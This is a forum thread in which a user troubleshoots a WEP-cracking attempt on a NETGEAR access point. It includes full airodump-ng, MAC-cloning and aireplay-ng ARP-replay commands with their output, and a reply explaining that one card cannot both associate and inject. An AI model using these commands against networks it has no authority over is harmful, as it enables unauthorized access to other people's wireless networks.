Results 1 to 3 of 3

Thread: airereplay-ng resets my MAC and ESSID.. help

  1. #1
    scottsee
    Guest

    Default airereplay-ng resets my MAC and ESSID.. help

    Every time I run the airereplay-ng attack it is reseting my ESSID to the first openkey network in my area and not allowing me to further the attack. here's whats going on

    Scanning my network to locate my BSSID using WEP on channel 11

    bt ~ # airodump-ng eth1 -t wep -c 11
    Shows the NETGEAR target AP

    CH 11 ][ Elapsed: 2 mins ][ 2009-01-02 13:36

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:90:4C:7E:00:29 191 29 224 0 0 11 54 WEP WEP NETGEAR

    BSSID STATION PWR Rate Lost Packets Probes

    00:90:4C:7E:00:29 00:C0:A8:BD:28:29 193 1- 1 0 6
    Setting up my ipw2200 to allow this attack.

    bt ~ # rmmod ipw2200
    bt ~ # modprobe ipw2200 rtap_iface=1 channel=11
    bt ~ # ifconfig eth1 down
    bt ~ # iwconfig eth1 ap 00:90:4C:7E:00:29
    bt ~ # iwconfig eth1 essid NETGEAR
    bt ~ # iwconfig eth1 key s:fakekey
    bt ~ # iwconfig eth1 mode managed
    bt ~ # ifconfig eth1 up
    Checking that my settings took

    bt ~ # iwconfig -eth1

    eth1 unassociated ESSID:"NETGEAR"
    Mode:Managed Frequency=2.462 GHz Access Point: 00:90:4C:7E:00:29
    Bit Rate:0 kb/s Tx-Power=20 dBm Sensitivity=8/0
    Retry limit:7 RTS thrff Fragment thrff
    Encryption key:6661-6B65-6B65-7900-0000-0000-00 Security modepen
    Power Managementff
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:9 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:5168 Missed beacon:0
    Now that i've configured my MAC and eth1 device to a clone that of my target Access Point i bring up my eth1 and rtap0 and run the airodump-ng agian this writeing avi to a dumpfile named crack.

    bt ~ # ifconfig eth1 up
    bt ~ # ifconfig rtap0 up
    bt ~ #
    bt ~ # airodump-ng -c 11 --bssid 00:90:4C:7E:00:29 --ivs -w crack rtap0
    Shows the output of the airodump-ng saving only the wanted packetes

    CH 11 ][ Elapsed: 4 mins ][ 2009-01-02 13:27

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:90:4C:7E:00:29 186 42 765 6 0 11 54 WEP WEP NETGEAR

    BSSID STATION PWR Rate Lost Packets Probes

    00:90:4C:7E:00:29 00:C0:A8:BD:28:29 199 1- 1 0 6
    This is where everything starts to fall apart. I start the airereplay-ng attack, everytime I try it just resets everything.

    Code:
     aireplay-ng --arpreplay -b 00:90:4C:7E:00:29 -h 00:C0:A8:BD:28:29 -i rtap0 eth1
    The interface MAC (00:16:6F:44:F2:35) doesn't match the specified MAC (-h).
    ifconfig eth1 hw ether 00:C0:A8:BD:28:29
    13:34:03 Waiting for beacon frame (BSSID: 00:90:4C:7E:00:29) on channel 11
    Saving ARP requests in replay_arp-0102-133405.cap
    You should also start airodump-ng to capture replies.
    Read 1232 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
    [b] As you can see the eth1 interface MAC resets from the cloned station causing no ARP packets to come through and my MAC address to default back to my original Mac. At this point i stop the attack and check the ifconfig eth1 and iwconfig eth1 and everything has reset. I don't [b/]

    ibt ~ # ifconfig eth1
    eth1 Link encap:Ethernet HWaddr 00:16:6F:44:F2:35
    UP BROADCAST RUNNING MTU:1500 Metric:1
    RX packets:2108 errors:17 dropped:5185 overruns:0 frame:0
    TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:3286812 (3.1 MiB) TX bytes:0 (0.0 b)
    Interrupt:17 Base address:0x6000 Memory:dfbfd000-dfbfdfff
    bt ~ # iwconfig eth1
    eth1 IEEE 802.11g ESSID:"Wireless1"
    Mode:Managed Frequency:2.462 GHz Access Point: 00:14:6C:7F:1E:86
    Bit Rate:54 Mb/s Tx-Power=20 dBm Sensitivity=8/0
    Retry limit:7 RTS thrff Fragment thrff
    Encryption key:6661-6B65-6B65-7900-0000-0000-00 Security modepen
    Power Managementff
    Link Quality=70/100 Signal level=-56 dBm Noise level=-83 dBm
    Rx invalid nwid:0 Rx invalid crypt:14 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:5168 Missed beacon:7
    I've pretty well scowerd and sifted through countless posts/threads/ and howto's. I've read the "cracking wep with ipw2200 (v1) and (v2)" on the aircrack-ng fourms, the ipw2200 wiki, and the ipw2200 faq on remote-exploit. I understad the MAC error and why it's happening, but everything I've been finding dosn't seems to explain the fix. I'm wondering if it has to do with the network mangment software. Like Ubuntu's Networkmanger, is there a deamon that needs to be killed to prevent this from happening? Any help will be SO welcome.

    Scott

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    I only skimmed through your post but it seems like you are trying to use the same interface to both connect to the AP in managed mode and to perform the actual attack in monitor mode. Naturally this will be unsuccessful which is why you see all the ifconfig/iwconfig settings being reset.

    You will need to use an additional device to play the role of the client as the same card cannot do both actions at once.
    -Monkeys are like nature's humans.

  3. #3
    scottsee
    Guest

    Default

    I thought I was using the rapt0 interface from the patched ipw2200 interface by executing the command

    modprobe ipw2200 rapt_iface=1

    and then using the (-i rtap eth1) command at the end of the airereplay to listen on rtap0 but inject on eth1. Am I doing this wrong?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •